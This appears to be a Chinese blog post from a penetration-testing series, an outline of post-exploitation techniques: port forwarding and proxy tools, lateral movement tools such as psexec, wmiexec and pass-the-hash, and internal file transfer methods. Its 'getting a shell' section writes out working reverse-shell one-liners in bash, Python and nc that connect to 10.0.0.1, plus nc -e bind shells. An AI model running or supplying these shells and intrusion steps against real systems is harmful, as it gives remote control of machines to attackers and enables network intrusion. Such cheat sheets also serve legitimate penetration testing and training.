美文网首页
5.5 其他

5.5 其他

作者: 最酷的崽_ec69 | 来源:发表于2019-12-04 10:19 被阅读0次

    5.5.1. 端口转发

    • windows
      • lcx
      • netsh
    • linux
      • portmap
      • iptables
    • socket代理
      • Win: xsocks
      • Linux: proxychains
    • 基于http的转发与socket代理(低权限下的渗透)
      • 端口转发: tunna
      • socks代理: reGeorg
    • ssh通道
      • 端口转发
      • socks

    5.5.2. 获取shell

    • 常规shell反弹
    bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
    
    python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
    
    rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
    
    • 突破防火墙的imcp_shell反弹
    • 正向shell
    nc -e /bin/sh -lp 1234
    nc.exe -e cmd.exe -lp 1234
    

    5.5.3. 内网文件传输

    • windows下文件传输
      • powershell
      • vbs脚本文件
      • bitsadmin
      • 文件共享
      • 使用telnet接收数据
      • hta
    • linux下文件传输
      • python
      • wget
      • tar + ssh
      • 利用dns传输数据
    • 文件编译
      • powershell将exe转为txt,再txt转为exe

    5.5.4. 远程连接 && 执行程序

    • at&schtasks
    • psexec
    • wmic
    • wmiexec.vbs
    • smbexec
    • powershell remoting
    • SC创建服务执行
    • schtasks
    • SMB+MOF || DLL Hijacks
    • PTH + compmgmt.msc

    相关文章

      网友评论

          本文标题:5.5 其他

          本文链接:https://www.haomeiwen.com/subject/inrgvctx.html